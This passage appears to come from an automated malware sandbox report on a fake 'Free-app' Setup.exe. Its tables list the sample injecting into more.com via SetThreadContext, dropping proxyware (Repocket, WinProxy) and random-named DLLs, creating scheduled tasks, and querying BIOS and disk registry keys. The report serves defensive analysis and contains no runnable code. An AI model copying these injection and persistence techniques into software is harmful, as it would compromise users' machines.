| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1700 set thread context of 6956 | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | C:\Windows\SysWOW64\more.com |
| PID 6680 set thread context of 7420 | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | C:\Windows\SysWOW64\more.com |
| PID 5516 set thread context of 6728 | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | C:\Windows\SysWOW64\more.com |
| PID 6772 set thread context of 5100 | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | C:\Windows\SysWOW64\more.com |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WProxy\WinProxy\pawns-sdk.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\7-zip.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\es.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\lv.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\dTyeYvmCU\UjMnXML.xml | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| File created | C:\Program Files (x86)\EJgSdoUbjkoU2\OqBZyaR.xml | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Microsoft.Win32.Primitives.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\kaa.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ug.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Text.Json.xml | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Security.Cryptography.Algorithms.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\PyvCjIxDuxQTC\rpkCVcK.xml | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Program Files (x86)\PyvCjIxDuxQTC\oySZlVd.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| File created | C:\Program Files\WProxy\WinProxy\p2p-sdk.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.Http.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Security.Cryptography.Encoding.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ku-ckb.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\tk.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.ValueTuple.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Repocket.exe.config | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\eo.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\nb.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\sk.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.IO.Compression.ZipFile.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.IO.FileSystem.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ne.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\XSdfuAZ.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| File created | C:\Program Files (x86)\chrome_PuffinComponentUnpacker_BeginUnzipping6476_1305509065\_platform_specific\win_x86\widevinecdm.dll | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.File.pdb | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pa-in.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\sw.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\dTyeYvmCU\hPmSnF.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| File created | C:\Program Files (x86)\PyvCjIxDuxQTC\jVoSEvj.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ps.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Microsoft.Bcl.AsyncInterfaces.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\aIpDuAr.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Program Files (x86)\PyvCjIxDuxQTC\zHIdRbP.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| File created | C:\Program Files (x86)\PyvCjIxDuxQTC\dvPHuzN.xml | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| File created | C:\Program Files (x86)\YxyTvvStIbUn\DKakodR.dll | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.File.xml | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Runtime.Extensions.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\7z.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ky.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pl.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ta.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Threading.Tasks.Extensions.xml | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\da.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\si.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.xml | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\EJgSdoUbjkoU2\uGIAUQC.xml | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\is.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\chrome_PuffinComponentUnpacker_BeginUnzipping6476_1305509065\_metadata\verified_contents.json | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.Loki.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Runtime.InteropServices.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.Http.pdb | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\7z.sfx | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\hr.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ko.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\Serilog.Sinks.RollingFile.xml | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Numerics.Vectors.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files\Geonode\Repocket\System.Reflection.dll | C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\en.ttt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ar.txt | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\yoGdnYnzlZOyEUZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bsuAwLimisXNmJFuDt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI26B6.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\ | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI363F.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI4BBE.tmp | N/A | N/A |
| File created | C:\Windows\Tasks\iHAtfpaAUcCnRIDUD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AE319172-8BC4-4D36-91DB-A6688A7A7C66} | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI4B9E.tmp | N/A | N/A |
| File created | C:\Windows\Tasks\bsuAwLimisXNmJFuDt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Installer\e5a8ca1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\yoGdnYnzlZOyEUZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Tasks\iHAtfpaAUcCnRIDUD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3139.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI33FB.tmp | N/A | N/A |
| File created | C:\Windows\Installer\e6025be.msi | N/A | N/A |
| File opened for modification | C:\Windows\Tasks\iHAtfpaAUcCnRIDUD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5a8ca1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\yoGdnYnzlZOyEUZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\yoGdnYnzlZOyEUZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI30C9.tmp | N/A | N/A |
| File created | C:\Windows\Installer\SourceHash{23170F69-40C1-2701-2401-000001000000} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9183.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5a8ca5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\iHAtfpaAUcCnRIDUD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI360F.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI4B7D.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Tasks\iHAtfpaAUcCnRIDUD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Installer\e6025bc.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI32D0.tmp | N/A | N/A |
| File created | C:\Windows\Tasks\bsuAwLimisXNmJFuDt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\yoGdnYnzlZOyEUZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\CBcZQdSiLQyVhMGrO.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI33CB.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\bsuAwLimisXNmJFuDt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\e6025bc.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSI3109.tmp | N/A | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b7d72a8ac39dc2e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b7d72a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b7d72a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db7d72a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b7d72a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
Creates scheduled task(s)
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
